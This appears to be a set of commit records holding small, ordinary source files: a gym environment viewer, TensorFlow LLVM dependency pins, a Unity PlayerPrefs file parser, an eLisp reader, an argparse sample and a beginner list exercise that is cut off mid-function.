openai/environments_viewer.py
|
openai/environments_viewer.py
|
import gym
# LunarLanderContinuous-v2
# BipedalWalker-v2
# Render random-policy rollouts of a gym environment.
env = gym.make('BipedalWalker-v2')

episode_count = 20
step_limit = 100

for episode in range(episode_count):
    obs = env.reset()
    for step in range(step_limit):
        env.render()
        print(obs)
        # Sample a random action and advance the environment one step.
        obs, reward, done, info = env.step(env.action_space.sample())
        if done:
            print("Episode finished after {} timesteps".format(step + 1))
            break
|
mit
|
Python
|
|
17173e7688c7a544678086eb5081051e90b3510b
|
Make gui.util a package.
|
MaxOLydian/OctoPrint,JackGavin13/octoprint-test-not-finished,MoonshineSG/OctoPrint,bicephale/OctoPrint,DanLipsitt/OctoPrint,Javierma/OctoPrint-TFG,sstocker46/OctoPrint,Jaesin/OctoPrint,abinashk-inf/AstroBox,abinashk-inf/AstroBox,EZ3-India/EZ-Remote,MoonshineSG/OctoPrint,MolarAmbiguity/OctoPrint,shohei/Octoprint,aerickson/OctoPrint,EZ3-India/EZ-Remote,ymilord/OctoPrint-MrBeam,masterhou/OctoPrint,mcanes/OctoPrint,ryanneufeld/OctoPrint,nickverschoor/OctoPrint,punkkeks/OctoPrint,hudbrog/OctoPrint,skieast/OctoPrint,senttech/OctoPrint,jneves/OctoPrint,d42/octoprint-fork,alephobjects/Cura,ymilord/OctoPrint-MrBeam,ymilord/OctoPrint-MrBeam,Jaesin/OctoPrint,alex1818/OctoPrint,masterhou/OctoPrint,Jaesin/OctoPrint,nicanor-romero/OctoPrint,nicanor-romero/OctoPrint,bicephale/OctoPrint,eddieparker/OctoPrint,shaggythesheep/OctoPrint,3dprintcanalhouse/octoprint2,ErikDeBruijn/OctoPrint,Jaesin/OctoPrint,madhuni/AstroBox,eliasbakken/OctoPrint,JackGavin13/octoprint-test-not-finished,dragondgold/OctoPrint,shohei/Octoprint,masterhou/OctoPrint,eddieparker/OctoPrint,madhuni/AstroBox,alex1818/OctoPrint,Voxel8/OctoPrint,uuv/OctoPrint,Mikk36/OctoPrint,dansantee/OctoPrint,C-o-r-E/OctoPrint,Javierma/OctoPrint-TFG,Catrodigious/OctoPrint-TAM,AstroPrint/AstroBox,abinashk-inf/AstroBox,chriskoz/OctoPrint,AstroPrint/AstroBox,beeverycreative/BEEweb,Salandora/OctoPrint,jneves/OctoPrint,shaggythesheep/OctoPrint,Javierma/OctoPrint-TFG,alephobjects/Cura,mayoff/OctoPrint,rurkowce/octoprint-fork,Salandora/OctoPrint,javivi001/OctoPrint,MoonshineSG/OctoPrint,nickverschoor/OctoPrint,CapnBry/OctoPrint,senttech/OctoPrint,alephobjects/Cura,uuv/OctoPrint,Mikk36/OctoPrint,eddieparker/OctoPrint,madhuni/AstroBox,SeveQ/OctoPrint,Voxel8/OctoPrint,nicanor-romero/OctoPrint,Salandora/OctoPrint,Catrodigious/OctoPrint-TAM,JackGavin13/octoprint-test-not-finished,shohei/Octoprint,SeveQ/OctoPrint,spapadim/OctoPrint,mayoff/OctoPrint,senttech/OctoPrint,ymilord/OctoPrint-MrBeam,MolarAmbiguity/OctoPrint,abinashk-inf/AstroBox,beever
ycreative/BEEweb,shaggythesheep/OctoPrint,C-o-r-E/OctoPrint,mcanes/OctoPrint,nickverschoor/OctoPrint,markwal/OctoPrint,CapnBry/OctoPrint,eliasbakken/OctoPrint,Voxel8/OctoPrint,dragondgold/OctoPrint,dansantee/OctoPrint,markwal/OctoPrint,3dprintcanalhouse/octoprint2,foosel/OctoPrint,senttech/OctoPrint,dansantee/OctoPrint,Javierma/OctoPrint-TFG,hudbrog/OctoPrint,javivi001/OctoPrint,shohei/Octoprint,chriskoz/OctoPrint,aerickson/OctoPrint,CapnBry/OctoPrint,aerickson/OctoPrint,rurkowce/octoprint-fork,CapnBry/OctoPrint,C-o-r-E/OctoPrint,SeveQ/OctoPrint,uuv/OctoPrint,javivi001/OctoPrint,Skeen/OctoPrint,chriskoz/OctoPrint,punkkeks/OctoPrint,3dprintcanalhouse/octoprint1,mcanes/OctoPrint,Skeen/OctoPrint,punkkeks/OctoPrint,mrbeam/OctoPrint,d42/octoprint-fork,jneves/OctoPrint,markwal/OctoPrint,bicephale/OctoPrint,beeverycreative/BEEweb,ErikDeBruijn/OctoPrint,foosel/OctoPrint,eliasbakken/OctoPrint,ryanneufeld/OctoPrint,3dprintcanalhouse/octoprint1,bicephale/OctoPrint,Mikk36/OctoPrint,mayoff/OctoPrint,alex1818/OctoPrint,Catrodigious/OctoPrint-TAM,MolarAmbiguity/OctoPrint,MoonshineSG/OctoPrint,sstocker46/OctoPrint,Skeen/OctoPrint,EZ3-India/EZ-Remote,dragondgold/OctoPrint,hudbrog/OctoPrint,beeverycreative/BEEweb,leductan-nguyen/RaionPi,skieast/OctoPrint,madhuni/AstroBox,mrbeam/OctoPrint,sstocker46/OctoPrint,leductan-nguyen/RaionPi,foosel/OctoPrint,shohei/Octoprint,spapadim/OctoPrint,leductan-nguyen/RaionPi,spapadim/OctoPrint,skieast/OctoPrint,MaxOLydian/OctoPrint,ErikDeBruijn/OctoPrint,leductan-nguyen/RaionPi,MaxOLydian/OctoPrint,mrbeam/OctoPrint,ryanneufeld/OctoPrint,JackGavin13/octoprint-test-not-finished,Salandora/OctoPrint,DanLipsitt/OctoPrint,ymilord/OctoPrint-MrBeam,ryanneufeld/OctoPrint,foosel/OctoPrint,nickverschoor/OctoPrint,AstroPrint/AstroBox,EZ3-India/EZ-Remote,chriskoz/OctoPrint
|
Cura/gui/util/__init__.py
|
Cura/gui/util/__init__.py
|
# coding=utf-8
|
agpl-3.0
|
Python
|
|
fd03d3c8a032e06ff2a84af48f6d23e3b3365695
|
Integrate LLVM at llvm/llvm-project@f011d32c3a62
|
Intel-tensorflow/tensorflow,tensorflow/tensorflow-experimental_link_static_libraries_once,tensorflow/tensorflow-pywrap_tf_optimizer,karllessard/tensorflow,Intel-tensorflow/tensorflow,tensorflow/tensorflow-pywrap_saved_model,tensorflow/tensorflow-experimental_link_static_libraries_once,karllessard/tensorflow,Intel-tensorflow/tensorflow,tensorflow/tensorflow-pywrap_tf_optimizer,yongtang/tensorflow,Intel-tensorflow/tensorflow,paolodedios/tensorflow,tensorflow/tensorflow-pywrap_tf_optimizer,tensorflow/tensorflow-experimental_link_static_libraries_once,karllessard/tensorflow,tensorflow/tensorflow,tensorflow/tensorflow-pywrap_tf_optimizer,karllessard/tensorflow,Intel-tensorflow/tensorflow,Intel-tensorflow/tensorflow,yongtang/tensorflow,yongtang/tensorflow,tensorflow/tensorflow-pywrap_saved_model,Intel-tensorflow/tensorflow,Intel-tensorflow/tensorflow,karllessard/tensorflow,karllessard/tensorflow,tensorflow/tensorflow-pywrap_tf_optimizer,tensorflow/tensorflow,paolodedios/tensorflow,yongtang/tensorflow,tensorflow/tensorflow-experimental_link_static_libraries_once,tensorflow/tensorflow-pywrap_tf_optimizer,paolodedios/tensorflow,tensorflow/tensorflow-pywrap_saved_model,tensorflow/tensorflow-experimental_link_static_libraries_once,tensorflow/tensorflow,tensorflow/tensorflow-pywrap_tf_optimizer,tensorflow/tensorflow,tensorflow/tensorflow-experimental_link_static_libraries_once,karllessard/tensorflow,tensorflow/tensorflow,tensorflow/tensorflow,tensorflow/tensorflow,Intel-tensorflow/tensorflow,tensorflow/tensorflow-pywrap_saved_model,paolodedios/tensorflow,yongtang/tensorflow,tensorflow/tensorflow,tensorflow/tensorflow-experimental_link_static_libraries_once,paolodedios/tensorflow,tensorflow/tensorflow-pywrap_tf_optimizer,tensorflow/tensorflow-pywrap_saved_model,tensorflow/tensorflow-experimental_link_static_libraries_once,karllessard/tensorflow,karllessard/tensorflow,tensorflow/tensorflow-pywrap_tf_optimizer,tensorflow/tensorflow-experimental_link_static_libraries_once,tensorflo
w/tensorflow-pywrap_tf_optimizer,tensorflow/tensorflow-experimental_link_static_libraries_once,Intel-tensorflow/tensorflow,tensorflow/tensorflow-experimental_link_static_libraries_once,paolodedios/tensorflow,yongtang/tensorflow,tensorflow/tensorflow-pywrap_tf_optimizer,tensorflow/tensorflow,tensorflow/tensorflow-pywrap_saved_model,tensorflow/tensorflow,tensorflow/tensorflow-pywrap_saved_model,yongtang/tensorflow,karllessard/tensorflow,yongtang/tensorflow,paolodedios/tensorflow,paolodedios/tensorflow,paolodedios/tensorflow,karllessard/tensorflow,yongtang/tensorflow,paolodedios/tensorflow,tensorflow/tensorflow-pywrap_saved_model,yongtang/tensorflow,tensorflow/tensorflow,tensorflow/tensorflow-pywrap_saved_model,yongtang/tensorflow,paolodedios/tensorflow,tensorflow/tensorflow-pywrap_saved_model,tensorflow/tensorflow-pywrap_saved_model,Intel-tensorflow/tensorflow
|
third_party/llvm/workspace.bzl
|
third_party/llvm/workspace.bzl
|
"""Provides the repository macro to import LLVM."""
load("//third_party:repo.bzl", "tf_http_archive")
def repo(name):
    """Imports LLVM.

    Args:
      name: the repository name to register the LLVM archive under.
    """
    # Pinned LLVM commit and the sha256 of its GitHub archive tarball;
    # both must be updated together.
    LLVM_COMMIT = "f011d32c3a625eb86d1e33a70100b0a031f5fcd4"
    LLVM_SHA256 = "b3ec1a2253da80c473df9addacc6ff5b7cfc3a788043a1c59480a93fd0d6fe0e"

    tf_http_archive(
        name = name,
        sha256 = LLVM_SHA256,
        strip_prefix = "llvm-project-{commit}".format(commit = LLVM_COMMIT),
        urls = [
            # TensorFlow mirror first, upstream GitHub as fallback.
            "https://storage.googleapis.com/mirror.tensorflow.org/github.com/llvm/llvm-project/archive/{commit}.tar.gz".format(commit = LLVM_COMMIT),
            "https://github.com/llvm/llvm-project/archive/{commit}.tar.gz".format(commit = LLVM_COMMIT),
        ],
        build_file = "//third_party/llvm:llvm.BUILD",
        patch_file = [
            "//third_party/llvm:infer_type.patch",  # TODO(b/231285230): remove once resolved
            "//third_party/llvm:build.patch",
            "//third_party/llvm:macos_build_fix.patch",
        ],
        link_files = {"//third_party/llvm:run_lit.sh": "mlir/run_lit.sh"},
    )
|
"""Provides the repository macro to import LLVM."""
load("//third_party:repo.bzl", "tf_http_archive")
def repo(name):
    """Imports LLVM.

    Args:
      name: the repository name to register the LLVM archive under.
    """
    # Pinned LLVM commit and the sha256 of its GitHub archive tarball;
    # both must be updated together.
    LLVM_COMMIT = "3cd5696a33095fe41c8c63f933d239f2c0dbb36e"
    LLVM_SHA256 = "5d6e9211f9886586b20fc4c88e9c72833fa686212df82957f3d0b67a5c090d23"

    tf_http_archive(
        name = name,
        sha256 = LLVM_SHA256,
        strip_prefix = "llvm-project-{commit}".format(commit = LLVM_COMMIT),
        urls = [
            # TensorFlow mirror first, upstream GitHub as fallback.
            "https://storage.googleapis.com/mirror.tensorflow.org/github.com/llvm/llvm-project/archive/{commit}.tar.gz".format(commit = LLVM_COMMIT),
            "https://github.com/llvm/llvm-project/archive/{commit}.tar.gz".format(commit = LLVM_COMMIT),
        ],
        build_file = "//third_party/llvm:llvm.BUILD",
        patch_file = [
            "//third_party/llvm:infer_type.patch",  # TODO(b/231285230): remove once resolved
            "//third_party/llvm:build.patch",
            "//third_party/llvm:macos_build_fix.patch",
        ],
        link_files = {"//third_party/llvm:run_lit.sh": "mlir/run_lit.sh"},
    )
|
apache-2.0
|
Python
|
8d473ee89ea43e5004b78314c0ca49cde0049980
|
Integrate LLVM at llvm/llvm-project@961fd77687d2
|
tensorflow/tensorflow-experimental_link_static_libraries_once,yongtang/tensorflow,tensorflow/tensorflow,Intel-tensorflow/tensorflow,yongtang/tensorflow,Intel-tensorflow/tensorflow,tensorflow/tensorflow-pywrap_saved_model,karllessard/tensorflow,tensorflow/tensorflow,tensorflow/tensorflow-experimental_link_static_libraries_once,paolodedios/tensorflow,Intel-tensorflow/tensorflow,tensorflow/tensorflow-pywrap_saved_model,yongtang/tensorflow,karllessard/tensorflow,yongtang/tensorflow,tensorflow/tensorflow-pywrap_saved_model,Intel-tensorflow/tensorflow,tensorflow/tensorflow-pywrap_tf_optimizer,karllessard/tensorflow,Intel-tensorflow/tensorflow,tensorflow/tensorflow-pywrap_tf_optimizer,karllessard/tensorflow,tensorflow/tensorflow-pywrap_saved_model,tensorflow/tensorflow-pywrap_saved_model,tensorflow/tensorflow,paolodedios/tensorflow,yongtang/tensorflow,tensorflow/tensorflow-pywrap_tf_optimizer,paolodedios/tensorflow,karllessard/tensorflow,tensorflow/tensorflow-pywrap_tf_optimizer,paolodedios/tensorflow,tensorflow/tensorflow-experimental_link_static_libraries_once,tensorflow/tensorflow-pywrap_tf_optimizer,karllessard/tensorflow,tensorflow/tensorflow,tensorflow/tensorflow-experimental_link_static_libraries_once,tensorflow/tensorflow-pywrap_saved_model,tensorflow/tensorflow-experimental_link_static_libraries_once,tensorflow/tensorflow-experimental_link_static_libraries_once,tensorflow/tensorflow-pywrap_tf_optimizer,tensorflow/tensorflow,tensorflow/tensorflow-pywrap_saved_model,tensorflow/tensorflow-experimental_link_static_libraries_once,karllessard/tensorflow,tensorflow/tensorflow,tensorflow/tensorflow,tensorflow/tensorflow,tensorflow/tensorflow-experimental_link_static_libraries_once,Intel-tensorflow/tensorflow,paolodedios/tensorflow,tensorflow/tensorflow-experimental_link_static_libraries_once,karllessard/tensorflow,tensorflow/tensorflow-pywrap_saved_model,paolodedios/tensorflow,karllessard/tensorflow,tensorflow/tensorflow-pywrap_tf_optimizer,Intel-tensorflow/tensorflow,ten
sorflow/tensorflow-pywrap_tf_optimizer,paolodedios/tensorflow,paolodedios/tensorflow,Intel-tensorflow/tensorflow,tensorflow/tensorflow,yongtang/tensorflow,Intel-tensorflow/tensorflow,Intel-tensorflow/tensorflow,yongtang/tensorflow,paolodedios/tensorflow,tensorflow/tensorflow,paolodedios/tensorflow,tensorflow/tensorflow-pywrap_tf_optimizer,tensorflow/tensorflow-pywrap_saved_model,Intel-tensorflow/tensorflow,yongtang/tensorflow,yongtang/tensorflow,tensorflow/tensorflow-pywrap_tf_optimizer,tensorflow/tensorflow-pywrap_saved_model,tensorflow/tensorflow-experimental_link_static_libraries_once,karllessard/tensorflow,yongtang/tensorflow,tensorflow/tensorflow,tensorflow/tensorflow-pywrap_tf_optimizer,yongtang/tensorflow,karllessard/tensorflow,paolodedios/tensorflow,tensorflow/tensorflow-pywrap_saved_model,tensorflow/tensorflow-experimental_link_static_libraries_once
|
third_party/llvm/workspace.bzl
|
third_party/llvm/workspace.bzl
|
"""Provides the repository macro to import LLVM."""
load("//third_party:repo.bzl", "tf_http_archive")
def repo(name):
    """Imports LLVM.

    Args:
      name: the repository name to register the LLVM archive under.
    """
    # Pinned LLVM commit and the sha256 of its GitHub archive tarball;
    # both must be updated together.
    LLVM_COMMIT = "961fd77687d27089acf0a09ea29a87fb8ccd7522"
    LLVM_SHA256 = "7c225e465ae120daa639ca68339fe7f43796ab08ff0ea893579a067b8f875078"

    tf_http_archive(
        name = name,
        sha256 = LLVM_SHA256,
        strip_prefix = "llvm-project-{commit}".format(commit = LLVM_COMMIT),
        urls = [
            # TensorFlow mirror first, upstream GitHub as fallback.
            "https://storage.googleapis.com/mirror.tensorflow.org/github.com/llvm/llvm-project/archive/{commit}.tar.gz".format(commit = LLVM_COMMIT),
            "https://github.com/llvm/llvm-project/archive/{commit}.tar.gz".format(commit = LLVM_COMMIT),
        ],
        build_file = "//third_party/llvm:llvm.BUILD",
        patch_file = [
            "//third_party/llvm:infer_type.patch",  # TODO(b/231285230): remove once resolved
            "//third_party/llvm:build.patch",
            "//third_party/llvm:toolchains.patch",
            "//third_party/llvm:temporary.patch",  # Cherry-picks and temporary reverts. Do not remove even if temporary.patch is empty.
        ],
        link_files = {"//third_party/llvm:run_lit.sh": "mlir/run_lit.sh"},
    )
|
"""Provides the repository macro to import LLVM."""
load("//third_party:repo.bzl", "tf_http_archive")
def repo(name):
    """Imports LLVM.

    Args:
      name: the repository name to register the LLVM archive under.
    """
    # Pinned LLVM commit and the sha256 of its GitHub archive tarball;
    # both must be updated together.
    LLVM_COMMIT = "4004fb6453d9cee1fc0160d6ebac62fa8e898131"
    LLVM_SHA256 = "faec068929d9f039b3f65d8f074bfbee4d9bdc0829b50f7848b110f2bf7c3383"

    tf_http_archive(
        name = name,
        sha256 = LLVM_SHA256,
        strip_prefix = "llvm-project-{commit}".format(commit = LLVM_COMMIT),
        urls = [
            # TensorFlow mirror first, upstream GitHub as fallback.
            "https://storage.googleapis.com/mirror.tensorflow.org/github.com/llvm/llvm-project/archive/{commit}.tar.gz".format(commit = LLVM_COMMIT),
            "https://github.com/llvm/llvm-project/archive/{commit}.tar.gz".format(commit = LLVM_COMMIT),
        ],
        build_file = "//third_party/llvm:llvm.BUILD",
        patch_file = [
            "//third_party/llvm:infer_type.patch",  # TODO(b/231285230): remove once resolved
            "//third_party/llvm:build.patch",
            "//third_party/llvm:toolchains.patch",
            "//third_party/llvm:temporary.patch",  # Cherry-picks and temporary reverts. Do not remove even if temporary.patch is empty.
        ],
        link_files = {"//third_party/llvm:run_lit.sh": "mlir/run_lit.sh"},
    )
|
apache-2.0
|
Python
|
0869a26cc061b86b31e7e5144bf90c276fa8c786
|
Add numpy_checkwiki.py
|
pv/pydocweb,pv/pydocweb
|
numpy_checkwiki.py
|
numpy_checkwiki.py
|
#!/usr/bin/env python
import subprocess
import os, shutil, tempfile
from numpy_towiki import *
# Output patch location; DIR comes from numpy_towiki's star import above.
PATCH = os.path.join(DIR, 'wiki.patch')

def main():
    """Collect local wiki edits and diff them against the base XML.

    Writes the resulting patch to PATCH. Python 2 script (print statement).
    Relies on names from ``numpy_towiki`` (regenerate_base_xml, exec_cmd,
    SITE_PTH, PYDOCMOIN, WIKI_CONF, BASEXML) via the star import.
    """
    regenerate_base_xml()
    os.chdir(DIR)
    new_xml = tempfile.NamedTemporaryFile()
    if not os.path.isdir(SITE_PTH):
        raise RuntimeError("directory %s not found" % SITE_PTH)
    exec_cmd([PYDOCMOIN, 'moin-collect-local', '-o', new_xml.name, WIKI_CONF])
    exec_cmd([PYDOCMOIN, 'patch', '-s', SITE_PTH,
              BASEXML, new_xml.name, '-o', PATCH], echo=True)
    print "Check in %s for what has been changed" % PATCH

if __name__ == "__main__": main()

# vim:sw=4 expandtab smarttab
|
bsd-3-clause
|
Python
|
|
728c4db461bdf22a668436ac25ca1cb9afb80e81
|
add argparse01.py
|
devlights/try-python
|
trypython/stdlib/argparse01.py
|
trypython/stdlib/argparse01.py
|
"""
argparse モジュールのサンプルです。
基本的な使い方について。
参考: http://bit.ly/2UXDCIG
"""
import argparse
import sys
from common.commoncls import SampleBase
from common.commonfunc import pr
class Sample(SampleBase):
    """Demonstrates basic argparse usage with two positional arguments."""

    def exec(self):
        #
        # The basic workflow for the argparse module is:
        #
        # (1) create an argparse.ArgumentParser object
        # (2) register argument definitions on the parser with add_argument
        # (3) call parser.parse_args
        # (4) read the argument values from the returned namespace
        #
        parser = argparse.ArgumentParser(description='argparse sample01')

        parser.add_argument('indir', type=str, help='input directory')
        parser.add_argument('outdir', type=str, help='output directory')

        args = parser.parse_args()

        pr('type(parser)', type(parser))
        pr('type(args)', type(args))
        pr('args.indir', args.indir)
        pr('args.outdir', args.outdir)
def go():
    """Append the sample positional arguments to sys.argv and run Sample."""
    sys.argv.append('~/indir')
    sys.argv.append('~/outdir')

    obj = Sample()
    obj.exec()

if __name__ == '__main__':
    go()
|
mit
|
Python
|
|
1fd85ad3741f985eb29aa16b4445ed658b3292d0
|
Add existing pyupp.py
|
fmoo/pyupp
|
pyupp.py
|
pyupp.py
|
"""
Read and write unity player preferences data with python
Implementation based on description of .upp files here:
http://answers.unity3d.com/questions/147431/how-can-i-view-a-webplayer-playerprefs-file.html
File structure:
16Byte header
[Saved Prefs]
for each saved pref:
1 byte: length of pref name
pref name
1 byte type identifier
[pref data] (depends on the type)
That are the possible type identifier:
0x00 - 0x7F is a short string that is smaller then 128 characters. The actual number is the length of the saved string.
0x80 is a long string. The type identifier is followed by an additional 32Bit integer (4-byte little endian) length. After the length int you'll find the actual string.
0xFD is an IEEE 32Bit float value(4 bytes).
0xFE is a 32Bit integer (4-byte little endian).
The header consists of the word "UnityPrf" (8 bytes) followed by (i guess) two version integers: 0x10000 and 0x100000
"""
import binascii
import argparse
import six
import struct
import logging
def _debug(msg, dat, is_string = False):
    """Log *dat* as hex (or repr, if *is_string*) at DEBUG level.

    NOTE(review): the unconditional ``return`` below disables this logging
    entirely -- the calls after it are unreachable. It looks like a quick
    off switch; confirm before removing.
    """
    return
    if not is_string:
        logging.debug("%s (%d bytes) => %s",
            msg, len(dat), binascii.hexlify(dat))
    else:
        logging.debug("%s (%d bytes) => %s", msg,
            len(dat), repr(dat))
def _unpack_int(dat):
assert len(dat) == 4
result, = struct.unpack('<i', dat)
return result
def _unpack_float(dat):
assert len(dat) == 4
result, = struct.unpack('<f', dat)
return result
def _pack_int(n):
    """Encode *n* as a 4-byte little-endian signed 32-bit integer.

    BUG FIX: the previous bounds checks were off by one at both ends --
    0x7fffffff and -0x80000000 are valid '<i' values but were rejected
    (``n < 0x7fffffff`` and ``n >= -0x7fffffff``).
    """
    assert n <= 0x7fffffff
    assert n >= -0x80000000
    assert isinstance(n, six.integer_types)
    return struct.pack('<i', n)
def _pack_float(f):
assert isinstance(f, float)
return struct.pack('<f', f)
def loads(data):
    """Parse a .upp byte string into a dict mapping pref name -> value.

    Layout: 16-byte header ("UnityPrf" + version), then repeated records of
    [1-byte name length][name][1-byte type id][payload].

    NOTE(review): written for Python 2 -- ``body[0]`` yields a one-character
    str which is fed to ``ord()``; under Python 3, indexing bytes would
    already return an int and the '\\xfe' comparisons would never match.
    """
    header = data[:16]
    assert header.startswith('UnityPrf')
    version = header[8:]
    _debug("version", version)
    result = {}
    body = data[16:]
    while len(body):
        #_debug("namelen", body[0])
        # Consume the 1-byte name length, then the name itself.
        namelen, body = body[0], body[1:]
        namelen = ord(namelen)
        name, body = body[:namelen], body[namelen:]
        #_debug("name", name, True)
        assert name not in result
        valuetype, body = body[0], body[1:]
        #_debug("valuetype", valuetype)
        if valuetype == '\xfe':
            # 32-bit LE int
            packed, body = body[:4], body[4:]
            #_debug(name, packed)
            result[name] = _unpack_int(packed)
        elif valuetype == '\xfd':
            # 32-bit LE float
            packed, body = body[:4], body[4:]
            result[name] = _unpack_float(packed)
        elif valuetype == '\x80':
            # long string: 4-byte LE length, then the string bytes
            packedlen, body = body[:4], body[4:]
            strlen = _unpack_int(packedlen)
            value, body = body[:strlen], body[strlen:]
            #_debug(name, value, True)
            result[name] = value
        else:
            # short string: the type byte itself is the length (<= 0x7f)
            strlen = ord(valuetype)
            assert strlen <= 0x7f
            value, body = body[:strlen], body[strlen:]
            #_debug(name, value, True)
            result[name] = value
    return result
def dumps(data):
    """Serialize a dict of name -> (str | int | float) into the UnityPrf
    binary format (the inverse of loads()).

    Python 2 only: builds the output as a byte string via chr() and
    string concatenation.
    """
    VERSION = '\x00\x00\x01\x00\x00\x00\x10\x00'
    result = 'UnityPrf' + VERSION
    for k, v in data.items():
        # The name length must fit in a single byte.
        assert len(k) <= 255
        result += chr(len(k))
        result += k
        if isinstance(v, six.string_types):
            if len(v) <= 0x7f:
                # Short string: the length byte doubles as the type byte.
                result += chr(len(v))
                result += v
            else:
                # Long string: 0x80 marker plus a 32-bit length prefix.
                result += '\x80'
                result += _pack_int(len(v))
                result += v
        elif isinstance(v, six.integer_types):
            result += '\xfe'
            result += _pack_int(v)
        elif isinstance(v, float):
            result += '\xfd'
            result += _pack_float(v)
        else:
            # Unsupported value type.
            assert False
    return result
if __name__ == '__main__':
    # CLI entry point: dump the parsed contents of a UnityPrf file
    # to stdout (Python 2 print statement).
    ap = argparse.ArgumentParser()
    ap.add_argument('file')
    ns = ap.parse_args()
    with open(ns.file, mode='rb') as f:
        dat = loads(f.read())
    print dat
|
apache-2.0
|
Python
|
|
64921ef6d8aafe505efdc30d070c138c741eb38f
|
Create __init__.py
|
google/BIG-bench,google/BIG-bench
|
bigbench/benchmark_tasks/meta_hello_world/__init__.py
|
bigbench/benchmark_tasks/meta_hello_world/__init__.py
|
apache-2.0
|
Python
|
||
d0ef6fbf836e124693ddafe0aeabf61c6b5ce1ae
|
add reader module
|
ASMlover/study,ASMlover/study,ASMlover/study,ASMlover/study,ASMlover/study,ASMlover/study,ASMlover/study,ASMlover/study,ASMlover/study
|
compiler/eLisp2/eLisp/reader.py
|
compiler/eLisp2/eLisp/reader.py
|
#!/usr/bin/env python
# -*- encoding: utf-8 -*-
#
# Copyright (c) 2015 ASMlover. All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions
# are met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list ofconditions and the following disclaimer.
#
# * Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in
# the documentation and/or other materialsprovided with the
# distribution.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS
# FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE
# COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT,
# INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING,
# BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
# LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
# CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
# LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN
# ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
# POSSIBILITY OF SUCH DAMAGE.
import re
import string
from atom import Symbol, String
from number import Number, Integral, LongInt, Float
from lisp import Lisp
from seq import List
DELIM = string.whitespace + Lisp.SPECIAL
class Reader(object):
    """Recursive-descent reader that turns Lisp source text into
    s-expressions (Lisp lists, Symbols, Strings and number atoms).

    The reader keeps a character cursor (`self.index`) into the raw
    source string and exposes get_sexpr() to pull one complete
    expression at a time.
    """

    def __init__(self, source=None):
        # raw_source: text being scanned; index: cursor position;
        # length is set lazily by get_sexpr().
        self.raw_source = source
        self.index = 0
        self.length = 0
        self.sexpr = []
        if source:
            self.sexpr = self.get_sexpr()

    def get_sexpr(self, source=None):
        """Read one s-expression starting at the cursor.

        Returns a Lisp list for a parenthesized form, otherwise the
        single token (atom). Raises ValueError on an unmatched right
        paren or on premature end of input.
        """
        if source:
            self.raw_source = source
            self.length = len(self.raw_source)
            self.index = 0
        token = self.get_token()
        expr = None
        if token == ')':
            raise ValueError('Unexpected right paren')
        elif token == '(':
            expr = []
            token = self.get_token()
            while token != ')':
                if token == '(':
                    # Nested list: step back so the recursive call
                    # re-reads the '(' it needs to recognize.
                    self.prev()
                    expr.append(self.get_sexpr())
                elif token == None:
                    raise ValueError(
                        'Invalid end of expression:', self.raw_source)
                else:
                    expr.append(token)
                token = self.get_token()
            return Lisp(expr)
        else:
            return token

    def get_token(self):
        """Scan and return the next token, or None at end of input.

        Tokens are: special single characters (Lisp.SPECIAL),
        double-quoted Strings, Integral/Float/LongInt numbers, and
        Symbols for everything else.
        """
        if self.index >= self.length:
            return None
        # skip whitespace
        while self.index < self.length and self.current() in string.whitespace:
            self.next()
        if self.index == self.length:
            return None
        if self.current() in Lisp.SPECIAL:
            self.next()
            return self.previous()
        elif self.current() == '"':
            # Parse a string literal; no escape handling -- scans to
            # the next unescaped double quote (or end of input).
            s = ''
            self.next()
            while self.current() != '"' and self.index < self.length:
                s = s + self.current()
                self.next()
            self.next()
            return String(s)
        else:
            # Accumulate characters up to the next delimiter,
            # then classify the lexeme.
            token_str = ''
            while self.index < self.length - 1:
                if self.current() in DELIM:
                    break
                else:
                    token_str = token_str + self.current()
                    self.next()
            # Pick up a trailing non-delimiter character at end of source.
            if self.current() not in DELIM:
                token_str = token_str + self.current()
                self.next()
            if Integral.REGEX.match(token_str):
                return Integral(int(token_str))
            elif Float.REGEX.match(token_str):
                return Float(float(token_str))
            elif LongInt.REGEX.match(token_str):
                # NOTE(review): if Integral.REGEX also matches plain digit
                # runs, this branch may be unreachable -- verify against
                # the regexes in the number module.
                return LongInt(int(token_str))
            else:
                return Symbol(token_str)
        return None

    def prev(self):
        # Move the cursor one character back.
        self.index -= 1

    def next(self):
        # Move the cursor one character forward.
        self.index += 1

    def current(self):
        # Character under the cursor.
        return self.raw_source[self.index]

    def previous(self):
        # Character immediately before the cursor.
        return self.raw_source[self.index - 1]
|
bsd-2-clause
|
Python
|
|
ef70a530e9827e96f4984a9c51424cd50b2000cf
|
Create numbersinlists.py
|
wdyer0726/CS101
|
udacity/numbersinlists.py
|
udacity/numbersinlists.py
|
# Numbers in lists by SeanMc from forums
# define a procedure that takes in a string of numbers from 1-9 and
# outputs a list with the following parameters:
# Every number in the string should be inserted into the list.
# If a number x in the string is less than or equal
# to the preceding number y, the number x should be inserted
# into a sublist. Continue adding the following numbers to the
# sublist until reaching a number z that
# is greater than the number y.
# Then add this number z to the normal list and continue.
#Hint - "int()" turns a string's element into a number
def numbers_in_lists(string):
    """Convert a digit string into a list in which each run of digits
    that does not exceed the running maximum is grouped into a sublist.

    A digit larger than every digit seen so far is appended to the top
    level (after flushing any pending sublist) and becomes the new
    running maximum; every other digit joins the current sublist.
    """
    first = int(string[0])
    result = [first]
    peak = first
    pending = []
    for ch in string[1:]:
        digit = int(ch)
        if digit > peak:
            # New maximum: flush the collected sublist, then emit the digit.
            if pending:
                result.append(pending)
                pending = []
            result.append(digit)
